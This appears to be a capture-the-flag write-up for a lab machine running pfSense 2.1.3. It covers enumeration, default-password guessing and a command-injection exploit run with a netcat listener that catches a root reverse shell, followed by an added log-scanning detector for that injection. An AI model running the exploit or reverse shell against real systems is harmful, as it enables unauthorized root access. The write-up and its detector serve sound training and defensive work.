Sense

OS: FreeBSD, Difficulty: Easy, IP: 10.10.10.60

Initial Enumeration

# Nmap 7.80 scan initiated Fri Sep 27 18:41:07 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,443 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.24s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.3 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   243.80 ms 10.10.14.1
2   243.69 ms 10.10.10.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 27 18:42:59 2019 -- 1 IP address (1 host up) scanned in 111.85 seconds

Checking out the page, it turned out to be the login interface of pfSense, and the default credentials admin:pfsense did not work. So I ran gobuster against the URL and found a text file called system-users.txt, which contained the username rohit and noted that the password was the company default. I tried pfsense as the password, and that combination got me into the dashboard.

As is evident from the version information on the dashboard, this is pfSense 2.1.3, so I ran the service and version against searchsploit and found one command injection vulnerability.

-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                                | exploits/php/webapps/43560.py
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

User and Root own

So I ran the exploit script with the parameters it required and was able to get a shell as root on the system.

python3.7 43560.py --username rohit --password pfsense --lhost 10.10.14.8 --rhost 10.10.10.60 --lport 5555
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.60] 21729
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /root/root.txt
d08c3***
# cat /home/rohit/user.txt
87213***
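From the defender's side, the exploit above leaves a trace in the web server's access log: a request to the vulnerable status_rrd_graph_img.php endpoint whose parameters carry shell metacharacters. The following is an added example, not part of the original writeup, that scans Apache combined-style access log lines (lighttpd can be configured to emit this format) for exactly that pattern. The sample log lines and the parameter names in them are constructed for illustration, not captured from the box.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" style; the parameter names and
# values are illustrative only and were not taken from the target.
SAMPLE_LOG = """\
10.10.14.8 - - [27/Sep/2019:18:50:01 +0000] "GET /status_rrd_graph_img.php?database=queues&graph=8hour HTTP/1.1" 200 1344 "-" "Mozilla/5.0"
10.10.14.8 - - [27/Sep/2019:18:50:07 +0000] "GET /status_rrd_graph_img.php?database=queues%3Bid HTTP/1.1" 200 0 "-" "python-requests/2.22"
10.10.14.8 - - [27/Sep/2019:18:50:09 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Endpoint named in the searchsploit result; shell metacharacters that have no
# business appearing in its query parameters once URL-decoded.
WATCHED_ENDPOINT = "/status_rrd_graph_img.php"
META = re.compile(r"[;|&`\n]|\$\(")
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+"'
)


def suspicious_params(target):
    """Return (name, decoded_value) pairs for parameters of the watched
    endpoint whose decoded value contains shell metacharacters."""
    parts = urlsplit(target)
    if parts.path != WATCHED_ENDPOINT:
        return []
    # parse_qsl URL-decodes values, so %3B is checked as ';'
    return [(n, v) for n, v in parse_qsl(parts.query, keep_blank_values=True) if META.search(v)]


def scan_log(text):
    """Return one finding per log line that injects metacharacters into the endpoint."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line; skip rather than guess
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({"line": lineno, "ip": m.group("ip"),
                             "time": m.group("ts"), "params": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} at {f['time']} -> {f['params']}")
```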

Learning outcome

I need to find better wordlists that are more comprehensive and thorough. The ones I used just barely got me through this time.


Last updated 5 years ago